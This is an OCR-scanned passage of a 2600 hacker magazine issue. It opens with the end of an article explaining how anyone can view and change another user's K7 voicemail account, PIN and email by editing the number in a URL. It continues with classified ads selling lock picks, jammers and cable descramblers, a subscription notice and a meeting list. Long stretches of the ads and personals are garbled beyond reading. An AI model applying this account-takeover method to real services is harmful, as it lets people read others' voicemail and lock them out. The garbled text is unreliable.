URL to the number for the account you ' re i nterested
i n. Everyone sti l l wi th me? I f you cl i ck on Modify
Settings you ' l l be abl e to see the user i nformati on
for whomever has that number. I f al l the fi el ds on
that page are bl ank i t has ei ther not been registered
or i t' s not a number provi ded by K7. The use of thi s
gapi ng securi ty hol e i s cl ear. I f you got a new emai l
and wanted the voi cemai l s sent there but you can' t
remember your PI N, now you can go i n, update
your emai l and change your PI N to somethi ng you
won' t forget so easi l y next time (you s i l l y goose) .
Or perhaps you don ' t want "yoursel f" to know that
you' re accessi ng the account. You can j ust make sure
the account is set to save messages to K7' s si te and
j ust l i sten to them on there. I ' m sure you can fi gure
out the rest of the possi bi l i ti es at thi s poi nt.
I thi nk i t' s al so i mportant to note that K7 i s
owned by a company who al so provi des other phone
servi ces, i ncl udi ng 800 servi ces for busi nesses. Whi l e
t he securi ty on t he other si tes may vary, does t he frui t
fal l that far from the tree?
Winter 2006-2007 Pge 61

For Sale
VENDING MACHINE JACKPOTERS. Go to www.hackershomepage.
-com for EMP Devices. Lock Picks. Radar Jammers & Controversial
Hacking Manuals. 407-965-5500
MAKE YOUR SOFWARE OR WEBSITE USER FRIENDLY with
Foxee. the friendly and interactive cartoon blue foxl Not everone
who will navigate your website or software application will be an
expert hacker, and some users will H a little help! Foxee is a hand
animated Microsoft Agent character that will accepl input through voice
commands, text boxes, or a mouse, and interact with your users thrugh
text. animated gestures, and even digital speech to help guide them
through your software with ease! Foxee supports 10 spoken languages
and 31 written languages. She can be added to your software through
C++. VB6. all .Net languages. VBScript. JavaScript. and many others!
Natively compatible with Microsoft Internet Explorer and can work with
Mozilla Firefox when used with a free plug-in. See a R demonstration
and purchasing information at www.foxee.net!
T-B-GONE. Turn off TVs in public places! Airports, rstaurants. bars,
anywhere ther's a TV. See why everyone at HOPE Number Six loved it.
Turning off ls really is fun. $20.00 each. www.lVBGone.com
JUST RELEASEDI Feeling tired during those late night hacking sessions?
Ned a boost? If you answered yes. then you need to reenergize with the
totally new HCk MuSlC vOlumO I CD. The CD is crammed with high
enery hack music to get you back on track. Order today by sending
your name. address. city. state. and zip along wh $15 to: Doug Talley.
1 234 Birchwood Drive. Monmouth. I L 61 462. This CD was assembled
solely for the readers of Z00and is not available anywhere else!
NET DETECTIVE. W you're just curious. trying m locate or find
out about people for personal or business reasons, or you're looking
for people you've fallen oul of touch wh. Net Detective makes il all
possible! Net Detective is used worldwide by private investigators and
detectives. as well as everyday people who use to find lost rlatives.
old high school and army buddies. deadbeat parnts, losl loves. people
that owe them money. and just plain old snooping arund. VISit us today
at www.netdive.or.uk.
JEAH.NET UNIX SHELLS SINCE 19 - JEAH's FreBSD shell accounts
continue to D the choice for pance-driven uptimes and a huge
list of virtual hosts. JEAH accounts let you stor data, use IRC, SSH.
and email with complete privacy and security. JEAH also ofers fast.
stable virual wab hosting and complete domain registraion solutions
- including regiion wh masked WHOIS info. Mention Z and
reeive setup waived! Join the JEAH.NET inon!
NETORKING AND SECURI PRODUCTS available at
OvationTehnology.com. W' r a supplier o Networ Security and
Internet Privacy products. Our online stor _ures VPN and firwall
h, wirless harwa". cable and DSL modemsruters. IP access
deviCeS. VIP proucts. pl cl products. and 0Wm.
W pride ourselves on prviding the highest level of technical expertise
and cu satisfaction. Our commRment to you... No surprisesl
Buy with confidence! Security and Privac is our business! Visit us at
http:/www.OvationTehnology.comIstore.h.
PHONE HOME. Tiny. sub-miniatur, 711 0 ounce. prgrammable!
rrammable touch-tone. muRi-frequency (DTMF dialer which can
M up to 15 louch-tone digits. Un is held against the telephone
reeiver's mice m dialing. P -HOME' to automatically dial
the S digits which C then D D thrugh the uRra miniatur
speaker. Ideal for E.T 's, childrn. Alzheimer victims. lost dogs/chimps.
signifcant others. hackers. and computer wizars. Give one to a
boy/giri friend or 10 that potential 'somene' you m a a party, the
supermarket, school. or the mall; with your pr-programmed telephone
number. heshe will always D able to call youl P, Ideal 0 you don't
want m'disclose' your telephone number but want 8 Dable
to call you locally or long distance by telephone. Key ring/clip. Umed
quantity available. Money order only. $24.95 + $3.00 . Mail order to:
PHONE HOME. Nimrd Division, 331 N. New Ballas Road. Box 41 0802.
CRC. Missouri 631 41 .
REAL WORLD HACKING: Intereste in roPS. steam tunnels. and the
like? H the all-new A SS~, a guidebook to the art of urban
exploration. frm the author of lnMmnzine. Send $20 postpaid in the
US or canada. or $25 Om, to PO Box 1 3. Station E. Tornto. ON
M6H 4El . Canada. or orer online at www.infiHration.or.
ENHANCE OR BUILD YOUR LIBRARY with any of Ihe following CD
ROMS: Hack Attacks Testing. Computer Fornsics. Master H W
Spy 2001 . Hacker' Handbook, Troublong & Diagnostics 98. |
Forbidden Knowledge 2. Trubleshooting & Diagnostics 2002. Police Call
Frequency Guide 2nd Edition, Computer Toybox, Answering Machine
2000. Hackers Encyclopedia 3. Maximum Security 3rd Edion. Network
Utilities 2001 . Screensavers 2002. Engineering 2000. Anti-Hacker Toolkit
2nd Edition & PC Hardware. Send name. address. city. state. zip. email
address (for updates only) and items orderd, along with a cashier's
check or money order in the amount of $20 for each item to: Doug Talley.
1 234 Birchwood Drive. Monmouth. IL 61 462.
FEEOOm OOWmE ON DVDI Years in the making but we hope
it was worh the wait. A double DVO set that includes the two hour
documentary, an in-depth interview with Kevin Mitnick, and nearly
thre hours of extra scenes, lost footage, and miscellaneous 8u. Plus
captioning for 20 (that's right. 20) languages. commentary track. and a
lot of things you' l l just have to find for yourselfl The entire two disc set
can be had by sending $30 to Fredom Downtime DVD, PO Box 752.
Middle Island. NY 1 1 953 USA or by orering from our online stor at
http:/store.2600.com. (VHS copies of the film stili available for $1 5.)
CAP'N CRUNCH WHISTLES. Brand new. only a few left. THE ORIGINAL
WHISTLE i n mint condition, never used. Join the elite few who own this
treasurel Once they are gone, that is it - there are no more! Keychain
hole for keyring. Identify yourself at meetings. etc. as a Z00 member
by dangling your keychain and saying nothing. Cover one hole and get
exactly 2600 hz. cover the other hole and get another frequency. Use
both holes to call your dog or dolphin. Also. ideal for telephone "mote
control devices. Price includes mai l i ng. $79.95. Not only a collector's
item but a VERY USEFUL device to carry at all times. Cash or money
order only. Mail to: WHISTlE, PO. Box 1 1 562-ST, CR. Missouri 631 05.
PHRAINE. The technology whout the noise quarteriy would like lO
thank the Z00 readers who have also become new subscribers and
encourages those who have not ACK their need m diverse computer
infon in conjunction with that of Z to dedicate some
packets and become a subscriber today! Visit us at our new domain
www.pearlyfrepress.comlphraine.
JINX-HACKER CLOTHING/GEAR. Tired of being naked? JINX.com
has 300+ T's, sweatshirts, stickers, and hats for those rar times
you need to leave your house. W've got swag fr everyone. frm the
budding nDOblet to the vintage geek. So take a five minute break H
suring prOn and check out htIp:/Iwww.JINX.com. Uber-Secret-5lal
Mea Promo: Use '2600v3n02' and get 1 0% of of your orer.
LEARN LOCK PICKING. Its EASY with our book and new video. The
2nd edition book adds lots mor Intersting material and illuons
while the video is filled with computer grphic cutaway views. Learn
W they don't want you to know. Any security s can be b,
many times right through the hdoor L the secrets and ws
of today's locks. If you want to get where you D sup to
D, this book could be your answer. Explore the empng world
of lock picking. Send t bucks for the book or vide to Standar
Publications. PO Box 2226HQ. Champaign, IL 61 825 or visit us at
www.standardpubllcations.comIdir600.html for your Z
price discount.
CABLE T DESCRAMBLERS. New. L $55 + $5.00 shipping. money
orer/cash only. Wrks on analog or analog/digital cable systems.
Prmium chennels and possibly PPV depending on system. Complete
with 1 1 0Vac power supply. Purhaser assumes sole rsibilit for
notiting cable operaor of u of descrmbler. Requirs a cable
cer O.e . Redio S 10 D u_ with the unil cable connects
to the converter. then the descrambler. then the output goes to S
tuned to channel 3. CD 9621 Olive. Box 28992-1, Ollvettet Sur. Missouri
631 32. Email: cabledescrambleruy@yahoo.com.
Wanted
HAVE KNOWLEDGE OF SECURrBREHES a yr k? H
rumors of cracke customer dat? Know m unaddrs
vulnerabilities i n a rtalles crdit C D b its management
doesn't know or care? W want your tips. W a a business newslefter
fcusing on security Issues in the financial industry: IT seurity. p
regulatory compliance. identity-thef and fraud. money-laundering.
Wer criminal activity meets banks, we ther. You can remain
anonymous. (Note: we will m print rumors cirulated by one person
or group without obtaining supporting evidence or cr ation
H other paries.) Contact banksecuritynewsOyahoo.com or call
21 2-564-8972, ext. 1 02.
Serices
Trouber 2000. Forbldden Subjects 3. Hackers Toolkit 2.0, Steal HACKER TOOLS TREASURE BOX! You get over 630 links to
This CD. Hacks & Cracks. Hackerz Krnlcklez. Elite Hackers Toolkit 1 , key resources. plus our proven methods for rooting out the har-
Pge 62 2600 Magazine
O~|DO OO|S, |DSBD|y| LS DS ||DKS BDO PDOOS O DU||O
yOU| OWD CUSOP|2O DBCK| (PMLN, DWO|K SCU||y] OO| K|.
D.lWB|DUDD|.CUmK
ADVANCED TECHNICAL SOLUTIONS. 84ZZ ~ 1 MODSOD |,
VBDCOUV|, .L. LBDBOB VL . D. (4] Z~bb. L|C|OD|C
COUDlP0BSU|0S |DO OU WDO |S %|y V|OOB|Dg yOU O| DUgg|Dg
yOU|CB|O|OC0. B OD P" OC|OD U|PDU|||ZO.
FREERETIREDSTUFFCOM - LODB O| |US | OUOBO CD
|OOUCS ~ |D 0XCDBDg O| SOP0 gOOO KB|RB ~ Dy K|Dg USBD|
UDWBDO CD |PS OU O yOU| D|gDDO|DOOO |BDO|||. D MLL BDO
BSyXBDODOOC|BSS||OBO W0DS||SOS|gDOO|DO |OCB| 0O|
| DyOU| W||||Dg O |CK U yOU| UDWBDO 0CD lOOUCSO| BDyD|Dg
|SyOU DBVOOODB.DBDKyOUO|D||DgUSS|BODWO|OBDOU
yOU|D0Wg|ODB| |0CyC||DglSOURDyO|S||DU|DgD|SBOORC|BSS||0O
BOV0H|S|Dg S|0S BDO DWSgRUSg|ODB||y. WWW.|00M||0OUH.COP
SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY
CALIFORNIA OR FEDERAL COURT? LODSU| W|D B SPBD|C WB|||O|
COPP|0O O D ||D0|B|OD O |DO|RB|OD. BP BD Bgg|SS|V0 C||R|DB|
O00DS0 |BWy|SC|B||Z|Dg|DDO||OW|DgySOCBS0S. UDBUDO||ZO
BCCSS,D0OlBOS0CS, |O0D|yDl, BDO|BORB|KBDOCOy||gD
|D||Dg0R0D. LODBC LRB| gUB|OB, LS. B (41b] ~bb1 , B
OPB|GS\BDOGB|UPD|.O|g, O| B |OBOWBy, BD |BDC|SCO, LP
41 ~4b. LlBOUB0 O YB|0 LO||0g BDO BDOG LBW CDOO|.
LOP||R0CBSCODSU|B|ODmZ |BBO0|S. P||CODSU|B|ODSa
S||C|y COD|OD|B| BDOlO0CODyD0BOHy~C||0D ||V||g0.
INTELLIGENT HACKERS UNIX SHELL MV|S0.N |S OWDO BDO
O0|B0O Dy |D0|||g0D DBCK . W0 D0||0V0 0V|y US0| DBS D0 |gD O
OD||D SCU||y BDO ||VBCy. D OOBy`S DOS||0 BD|DBCK| BPOSD0,
|D0|||g0D DBCK0|S |U|l0D D0O kB SCU| |BC O WO|K, COP||0,
BDO 0X|OlW|DOUD|g~D|OD||OOK|Dg OV0|D0|| SDOU|O0|. MOS0OB
LD|CBgO cU|D|XW|D JUD|0|||0|BO LO |O0C|OD. NU|||0 |0L
S|V|S B 4 Z.4 gDZ. POlOBD|0 ||C|Dg H $PODD W|D B RODy
DBCKgUBlBD0B. L0|R0 Z% O|SCOUD mZ00|BO0lS.LOUOD COO0.
BV0Z. D.WWW.V|S0.D0
ANTI-CENSORSHIP LlNUX HOSTING, hB|\OD D |OV|OS
BHOlOBD|0 W0D DOS|Dg, PB|| BCCOUDS, BDO OOPB|D |g|S|B|ODS DBSO
OD OUB| RCSSO| 4 Z.4 LMZ LDUX S8. LU| DOS|Dg |BDS SB|
|OP OD|y $.b 0| PODD. D|S |DC|UO0S SUO|l O| yDOD, 0, M,
NywL, BDO RO. YOU CBD DOW CDOOS0 D D0 LP, |DgBO,
BDO OD0| O 8 |OCB|ODS O BVO|O C0DSOlSD| BDO gUBD0B R
SCD. W S0C yOU| ||VBCy. 8yR0D CBD D0 Dy L~LO|O, ByB|,
C|O| CBG, DBDK 0 O| WS0|D LD|OD. WWW.KB|OD.COP O|
O0\B||S.
ARE YOU TIRED O 0V|Dg ||0S O CO| CBlO O0lS BDO OD0|
OS\B| S8RYOU CBD`]US DlOW D0R | DD0U O||0CyC| D0R BS
SOP0OD0 COU|O g0 B DO|O O D0R 8DO US0 D0R O S0B| yOU| O0D|y.
YOU CBD` ]US |0 D0R ||0 U OD yOU| K|CD0D BD|0. O |DS0BO yOU
DBV0 O D0 DOD0l0 W SDOO|Dg BDO O|SOS|Dg O D0R. W||, DO
BDyRO. L!ODNB||BCK.COR DBS B m SO|U|OD kyOU. P|| COSS
o O|SOS| |DC|UO|Dg O0||V0Q W||| D0 B|O Dy D0 CORBDy SODS|D|0
O| S0DO|Dg D0 S O yOU. O W8S|Dg yOU| VB|UBD|0 |R0 O0B||Dg
W|D m OD0f 0|0 a S|D|0 m ClBB|Dg. LD0CK o OU|
D0W|y gD0O WO|COR|00|DOlRB|OD BDO DBCK yOU|
RB||DX.
BEEN ARRESED A COMPUER OR lCHNOLOGY RELTED
CRIME? MBV0 8D K, |DV0D|OD, O| DUS|D0SS yOU WBD O DUy, S0||,
RI0C, O| R8lK0 W|SD yOU| 8 OR0y BCUB||y UDO0OOO yOU WD0D
yOU S08K L8WL o N|CDB0| .lB0D, cS. | SD0SO|U|ODO
yOU| Z1S C0 |0gB RD|0RS. OfR0| ySL BDO R0RD0| O RBDy
||VB!0 `S S|DC0 1 1 DOW BVB||BD|0 O O|l0|y lBSD yOU O|
DfOg0 D0 CORRUDC8|ODS @ 8DO 8SSS yOU| CURD|0gB COUDS0|.
cXR0|y dm KDOW|0Og0 |BlO|Dg C|R|DB| 8DO C|V|| ||BD||\y m
CORUI0f 8 0DDO|Ogy 80O BC|ODS [1 O..L. 1 Z, 1 Z, 1 ,
1 1 , 1 41 , 1 4Z, 1 4, Zb1 1 , Zb1 Z, cLP, LNLP, 1 0|0COR A,
0C.], OOR8|D DBR0 O|SU0S, |DI0|0 R0ly RfS SUCD
CDS, U0, ||C0DS0S, BDO BCU|S||ODS W0|| @|
DUS|D0SS 8 CO0 |BW. L 00V0D y 0X0l|0DC0 DDOUS0
|BgB COUDS0| O B CORUBfCODSU|Dg DUS|D0SS BS W0|| BS BD OV0l Z
y0Bl DBCKgRUDO | D CORU0|, 0|0CORRUDCB|ODS, BDO 0CDDO|Ogy
RB0. UD||SD0O M V|0W BlC0, CODfDU0O O DB|ODB||y
UD|SD0O DOOKS, 8DO SUDR|!0O Dl0S O D0 OD|0O B0S UR0
L OD D0 BDO 0DDO|Ogy l0B0O |SSU0S. POR|0O O D0 O..
UR0LOUD, ZDO LRU0 LOUD o PS, 8DO B|| N0W YOlK B0
COUDS 8 BR||B| W|D OD0| ]U||SO|C|ODS BS W0||. NBDy B0yS W|||
\BK0yOU|OWBDyCODS|O0lB|OD O OU|CU|U| BDO W||| SyOU
R0|y B SK o M O W, W | | | ]UO|C0S. Ny
OC0UDO0OSOU|CU|U, | SSR|COyOU|S|UB|OD, BDO W|||
m yOU W|D D0 BDO UDO|Dg yOU O. NO W m
D0 |D||B| BDO CODHO0D|B| CODSU|B|OD BDO, mBDy BSOD w CBDDO
D0| yOU, W0 W||| 0V0DQO|DO60S0WDOCB DOCDB@0. O
yOU DBV0 DOD|Dg O |OS0 $ 0lD8S 0V0lyD|Dg O gB|D Dy CODBC|Dg
USW. V|S| USB. D.WWW.CORCOP O|CB|| b1 ~Wc~McL
[b1~].
Announcements
OF TE H K | S D0W00K|y OD0 DOU| DBCK0| |BO|O SDOW
WOD D|gDS B . R L OD WP .b N | D N0W YlK L|y.
YU CBD B|SO UD0 | D OV0| D0 m WWW.Z.COROHD0DOOK O| OD
SDO|WBV0 |D NOlDBDOOUDPR0l|CB B 41 bKDZ. PRD|V0S OB|| SDOWS
OB|Dg DBCK O 1 CBD D OUDO B D Z00 S|, DOW |D P O|PB
DOWS |OP 1 ~Zb DOW BVB||BO| | D LVL~M O|PB O| $| L|
SUDSC||D OD0D0W D|gD UB||y BUO|O SP|CO|OD|y $b. LBCD PODD
yOU'|| g0 B D0W|y l0|BSO yB| O J HOOk |D D|OBOCBS UB||y
(B|D| DBD |V|OUSOD||D ||BSS]. DO CDCK O| PODyO|O|O
Z L OX bZ, N|OO|0 S|BDO, NY 1 1 b LP O| O|O| D|OUgD OU|
OD||D SO| B D.SO|.Z.COP. YOU| ODBCK OD D |Og|BP |S
B|WByS W0|COP B ODZ.COP.
PHONE PHUN. D.HDODDUD.US. |OgOVOOO |D|S|Dg |OD
DUPD0|S. DB|yOU||DOS|
DO YOU WANT ANOTHER PRINTED MAGAZINE DB COP|PDS
Z W|D V0D RO DBCK|Dg |DC|PB|OD /O8Q HvOlu0On |S B
PBgBZ|D |OP D L|g|B| LBWg OUDO BDOU DBCK|Dg BDO CDDO|Ogy.
C||CB||y, W |OOK B UDO|g|OUDO O|CS O CDDO|Ogy |DC|UO|Dg.
MBCK|Dg, DlBK|Dg, CU||y, L|DSD LX|O|B|OD, L|g|B| M|gDS, BDO
PO. O|PO|0|DO|PB|OD,O|OO|O|yOU|||DOCOy OD||D, V|S| US
B D.WWW. D|DlV.COP WD| yOU W||| B|SO |DO |DS|UC|ODS OD RB||
OlO|S. W0|COP0OD VO|U|OD
CHRISTIAN HACKERS' ASSOCIATION: LDCK OU D0 WD Bg
D.WWW.CD||S|BDDBCK|.Olg O| O0B||S. W X|S O RPO B
CORPUD|y O| LD||S|BD DBCK0|S O O|SCUSS BDO |PBCD |B|P WD|0
mBDOCDDO|Ogy|D|SCO|DU|OSOS|Dg ||VSC|BDgO Dy
LOO`S g|BCDRUgDB|D |DJSUS.
Personals
SEEKING NON-STAGNANT MINDS O| PUUB| |||UP|DB|ODXCDBDg
O DOUgDS BDO |O0BS. D|00 y0B|S |l OD Py SD0DC0 BDO VD
W|D B|| Py COBCD|Dg D0 WB||S S||| CBD CB||y B OC0D CODV|SB|OD.
D0|SS |DC|UO0 C|yOglBDy, SCU||y, CODS||BCy DO||S, PB||B|
BHS, BDO BDyD|Dg CORU| l0|BO. P|| |0 0 |||O O. NBX M|O|,
81 L.L.L., 1 1 1 BOOOCK MO., Py|DB, LL 1 .
IN SEARCH OF FRIENDS/CONTACTS: MB||RBOO Dy |y|Dg V|ODC-
DUQ|DgBg0DSBDOL.. OSB|DSCO|SO|C||PO|ODCOPP|. D
COUH| DBO BSDOWDB||'SCDBDC| DD||. LD|SSOUSPB|\DgOv|DPD
Dy XDUP|Dg D0 0XCU|BO|y BSU| lOV O Py |DDOCDC, R
DO0|0SS|y OUDg0ODO O|D0 OU|B|OD. D0|SOD|yB |||g|BPO| R0
DD WO 00|D||0S. |BUS0O |0U|D O OlV|W|DOU B gD. W| ||
BDSW0| B||. W. WDWOHD OS| 8Z1 1 1 , OUDBS LO|OD LD0|,
L 0OR |PPODS Ll|V0, LDBSOD, NL4.
PRISONER SEEKS FRIENDS O D0| W|D DOOK |0V|W |OOKUS OD
PRBZOD Dy KyWO|OS. LOP C| PB]O|, D||Sy O CBCD U O D |B|
WO||O Oo Ry 0DQ. DBV Ry OWD UDOS O DUy DOOKS. OD|y D00O
V|BWS. L| . . . ` PNLLNNLMS8Vy | D L++yDODMNywL, BDO
`R S0K|Dg |By0|S BDO |Og|BRR0 O| D| |OB OD WDB`S OU
D0|. |0BS D0|. h0D MOD0|S JZ, LP~PZZ44 L L OX
bZ4, LOlCOlBD,LPZ1 Z.
OFFLINE OUTLAW IN TEXAS | S |OOK|Dg O|BDy DOOKS LD|XLDUX CBD
g0 Ry DBDOS OD. P|SO V0Q |D0S0O |D ||VBCy| D B|| Bl0BS. yOU 0
O|D R0 DD0 ||gD O||OD O|00| ||K0 0BCD|Dg BD O|O OOg SOR0 D0W
lCKS, OR R0 B ||D0. ` | | BDSW0| B|| |00lS. RSO DOS0 WDO B|BOy
DBV0, yOU KDOW WDO yOU a. W||||BR LDO|0y ZZ4, 1 N bb,
OSDBRD,.
IN SERCH OF NEW CONTACTS 0V0lyO8y. DBV0B|O O|RO BSS
BDO B|WByS U k B gOOO O|SCUSS|OD. JO|D SOU|C BUO| BDyOD0
L COU0 0` D8V0 O D OD B0|. D0S1S DO ||R|0O . |OW~|0V0|
L COO|Dg, 0RD0OO0O SyS0RS, C|yO, |BO|O0|0COR, BDO CODS||BCy
D0Q. W||| |yOB||. l|BDB|C0OOPZ1~,L NCh0BD, L.OX
, ,P1 1 .
STILL IN THE JOINT, LD|y By0B|O|SO |0L hDOWDBSP|D8D|S, DUS0O
mDBCK|Dg DBDKS BDO l o UDBUDOlZBW||0H. `R |OOK|Dg
D0B|HBDyOD0| DD0m W.Q|D0S0O | DBDy|O0BS BlO|Dg
UU 0R|OyR0D. W||| SODO O B||. J0l0Ry LUSD|Dg 8Jb1 1 ,
L0D|D0B |SOD, LOXZ1 , R0||B|, LPZZb1Z1 .
CONVICTED COMPUTER CRIMINAL | D 0O0lB| l|SOD OO|Dg
OD P0| yDORR0 VB|0DC0 | D lSOD. |0BS0 Wf0. BU| LUD|
1 bZ~14, OX1 , 8H, LPZ.
SORMBRINGER'S 41 1 : PR DO g0|Dg B B|| SDBK0 | D COUH W|DOUI
BD 8OH0y, SO |`S 1 b RO y0BlS O U||. NO B COO0|O| B W0D O
O|BSDOlWBV0SCBDD0|CORLM-1 ]DB OODB0O OB SDOlWBV0
SIB|OD BDO SOR0 OD0| |D|Dg S . WOU|O |OV O B|K SDO W|D
0O|0ODl8O|O,OOV0|l8O|O,8DODBPl8O|O.W|||lBSODOOB||| 0
0CDD|CB| O|DO. W.h. R|D, 444-, L LURD0BDO, L OX 1 ,
LURD0l|BDO,NLZ1 b1 ~ 1 . WD. WWW.SO|PD||Dg0|.V. LDKO 0|
ONLY SUBSCRIBERS CAN ADVERTISE IN W LOD` 0V0D D|DK
8ly|Dg OBK0OUBDBOUD|0SSyOUSUDSClD0 P||BOSam BDO
D0 |S DO BROUD o ROD0y W0 W||| 8CC0 m B DOD~SUDSC||D0| BO.
W DO0 DB`S C|0B|. LCOUlS0, W0 mO D0 ||gD O BSS]UOgR0D
OD yOU| BO BDO DO f|D |`S 8RB|Dg|y SU|O O| DBS DOD|Dg B B||
O OO W|D D D8CK0| WO||O. W m DO gU BS O D0 D
fgD0USD0SS, SBD|!y, 0C. OD0 0O|0 8S|Dg D. LODBC D0R
ByOU|0l||.P||SUDR|SS|ODSaO|LNc LcLNLY 0yOUWBDO lUD
yOU| a m DBD ODC0 yOU RUS! l0SUDR| | 0 |R0. LOD 0X0
US R fUD mDBD OD0 BO O| yOU | DB S|Dg|0 |SSU0 0|D0|. DC|UO0yOU|
BOOl0SS|BD0|0DV0|O0O|BDOOCOySO W KDOW yOU`|BBSUDSC||D0|.
BDOyOU|BOOZ NBlK0|BC0,LOX, N|OO|0 S|BDO, NY1 1 b.
D0lneWrSprng M.31/07.
Winter 2006-2007Pge 63
Answer c h o i c e for Aut umn 2006 puz z l e :
H Are Pac-Man, App l e , Mi c ro s o f t , a n d Dua l -Core gra i n
s i l o s a s Amer i c an a s P i ? No ! "
-- Mi s t er U I e , 20500
NEW PRI CES
So how does al l thi s affect you? Si mpl e. I t won't affect you at al l i f you're a subscri ber.
If you buy us at a newsstand i n the Uni ted States, you' l l pay 75 cents more. If you buy
us at a newsstand i n Canada, you' l l pay a dol l ar l ess. And i f you're somewhere el se,
we honestl y don't know.
As th i s is our fi rst pri ce change on the newsstand i n more than three years and onl y the
second si nce 1 999, i t's actual l y a bargai n consi deri ng how much the cost of everythi ng
has gone up i n that peri od and the fact that we've added l ots of pages over the years.
But i f you wi sh t o really cl i ng t o t he past, consi der t hat our subscr i pt i on pr i ce has not
gone up i n over 1 5 years ! How i nsane i s that ?
Al l i n al l , we bel i eve i t's sti l l a pretty good deal , regardl ess of how you choose t o buy
our zi ne. Remember that we survi ve sol el y on subscr i ber support. I f we had adverti s i ng
we cou l d probabl y gi ve the th i ng away for free. But then we j ust wou l dn't be the same
and wou l d probabl y be unabl e to pri nt the ki nds of t hi ngs we enj oy pri nti ng.
I f you found us i n a bookstore or at a newsstand, you're probabl y aware that most
of the magazi nes surroundi ng us are noth i ng l i ke 2600. By keepi ng our sal es strong,
you're voi ci ng support for somethi ng di fferent and hopefu l l y that wi l l enabl e other
al ternati ves to be consi dered by di stri butors and bookstores as wel l . And th i s i s how
the general publ i c i s reached. Despi te al l of the TV channel s, audi o devi ces, and
I nternet bl ogs we're constantl y bombarded wi t h, they are j ust no substi tute for books
and magazi nes. We hear comments l i ke th i s more than ever these days.
So here's the deal . I f you buy the copy you're hol di ng i n your hand at a store, there's
no need to read further ( unl ess you want some back i ssues) . If you want to subscr i be,
i t's $20 for the U. S. and Canada, $30 el sewhere. Back i ssues are $5 each ( $6. 50
overseas) except for t he most recent one whi ch i s $5. 50 ( $7. 00 overseas) . Pl us there
are al l sorts of bu l k di scounts avai l abl e at our on l i ne store l ocated at
http: //store. 2 600. com.
The address t o send physi cal subscr i pt i on and back i ssue requests i s:
2600
PO Box 752
Mi ddl e I sl and, NY 1 1 953 USA
( Don't worry, it comes i n an envel ope that doesn' t have our name on i t, j ust our return
address. We're aware of evi l parents, spouses, bosses, and pr i son guards who are
watch i ng you. )
Winter 2006-2007P
g
e 65
ARGENTINA
Bueos Aires: I n the ba MSan
Jose 05.
AUSTRALIA
Melbourne: Caffeine at Reuft Bar.
16 Swanston Walk, near Melbourne
Central Shoppn Centre. 6:30 pm.
Sydney: The Cystal Palace, front
barlbistro, opposite the bus station
area on George Sf. at Central Sta
tion. 6 pm.
AUSTRIA
Graz: Cafe Haltestelle on Jakomini
platz.
BRAZIL
Belo Horlzonte: Pelago's Bar at As-
5ufeng, near the payphone. 6 pm.
CANADA
Albera
Calgary: Eau Claire Market food
cour by the bland yellow wall. 6 pm.
British Columbia
Vancouver: lupe Caffe &Bar, 1 01 4
West Georgia St.
Victoria: QV Bakery and Cafe, 1 701
Government St.
Manitoba
Winnip: St. Vital Shopping
Centre. food cour by HMV.
New Brunswick
Moncton: Ground Zero Networks
Internet Cafe, 720 Main St. 7 pm.
Ontario
Barrie: William's Coffee Pub, 505
Brne Drive. 7 pm.
Guel ph: William' s Coffee Pub, 492
Edinbourgh Road South. 7 pm.
Ottawa: World Exchange Plaza, 1 1 1
Albert St. . second floor. 6:30 pm.
Toronto: College Park Food Court,
across from the Taco Bell.
Waterloo: William's Coffee Pub, 1 70
University Ave. West. 7 pm.
Windsor: University of Windsor,
CAW Student Center commons area
by the large window. 7 pm.
Quebec
Montreal : Bell Amphitheatre, 1 000,
rue de la Gauchetiere.
CHINA
Hong Kong: Pacific Coffee i n Festi
val Walk, Kowloon Tong. 7 pm.
CZECH REPUBLIC
Prague: Legenda pub. 6 pm.
DENMARK
Aalborg: Fast Eddie' s pool hal l.
Aarhus: I n the far corner of HIe DSB
cafe in the railway station.
Copenhagen: Cafe Blasen.
Sonderborg: Cafe Druen. 7: 30 pm.
EGYPT
Por Said: At the foot of the Obel i sk
( EI Missal l ah).
ENGLAND
Brighton: At the phone boxes by the
Sealife Centre (across the road from
the Palace Pier). 7 pm. Payphone:
(01 273) 606674.
Exeter: At the payphones, Bedford
Square. 7 pm.
London: Trocadero ShOppi ng Cen
ter (near Piccadilly Ci rcus), lowest
level. 6:30 pm.
Manchester: The Green Room on
Whi tworh St. 7 pm
Norwich: Borders entrance to
Chapelfield Mal l . 6 pm.
Readi ng: Afro Bar, Merchants Place,
off Friar S1. 6 pm
FINLAND
Helsinki: Fenniakortteli food court
(Vuorikatu 1 4)
FRANCE
Grenoble: Eve, campus of St.
Martin d'Heres. 6 pm.
Paris: Pl ace de la Republi que, near
the {empty} fountai n. 6:30 pm
Rennes: I n front of the store "Blue
Box" close to Place de l a Repub
l i que. 8 pm.
GREECE
Athens: Outside the bookstore Pa
paswtiriou on the corner of Patision
and Stournari.
IRELAND
Dublin: At!Ophone boOs on
Wicklow St. beside Tower Records.
7 pm.
ITALY
Milan: Piazza Loreto in front of
McDonalds.
JAPAN
Tokyo: Unux Cafe i n Akihabara
district. 6 pm.
NEW ZEALAND
Auckland: London Bar, upstairs,
Wellesley St., Auckland Central.
5:30 pm.
Christchurch: Java Cafe, corner of
High St. and Manchester St. 6 pm.
Wellington: Load Cafe in Cuba
Mall. 6 pm.
NORWAY
Oslo: Oslo Sentral Train Station.
7 pm.
Tromsoe: The uppr floor at Blaa
Rock Cafe, Strandgata 14. 6 pm.
Trondheim: Rick's Cafe i n Nordre
gate. 6 pm.
PERU
Lima: Barbilonia (ex Apu Bar), en
Alcanfores 455, Miraflores, at the
end of Tarata St. 8 pm.
SCOTLAND
Glasgow: Central Station, pay
phones next to Platform 1 . 7 pm.
SOUTH AFRICA
Johannesburg (Sandton City):
Sandton food court. 6:30 pm.
SWEDEN
Gothenburg: 2nd floor i n Burger
King at Avenyn. 6 pm.
Stockhol m: Outside Lava.
SWITZERLAND
Lausanne: I n front of the MacDo
beside the train station.
UNITED STATES
Alabama
Auburn: The student lounge
upstairs in the Foy Union Bui lding.
7 pm.
Huntsville: Stanlieo's Sub Villa on
Jordan Lane.
Tuscaloosa: McFarland Mall food
court near the front entrance.
Arizona
Phoenix: Peter Piper Pizza, 3945 E.
Thomas Rd.
Tucson: Borders i n the Park Mall.
7 pm.
California
Los Angeles: Union Station,
corner of Macy &Alameda. Inside
main entrance by bank of phones.
Payphones: {21 3} 972-951 9, 9520;
625-9923, 9924; 61 3-9704, 9746.
Monterey: London Bridge Pub, 2
Whar i l .
Orange County (Lake Forest):
Diedrich Coffee, 22621 Lake Forest
Drive. 8 pm.
Sacramento: Round Table Pizza
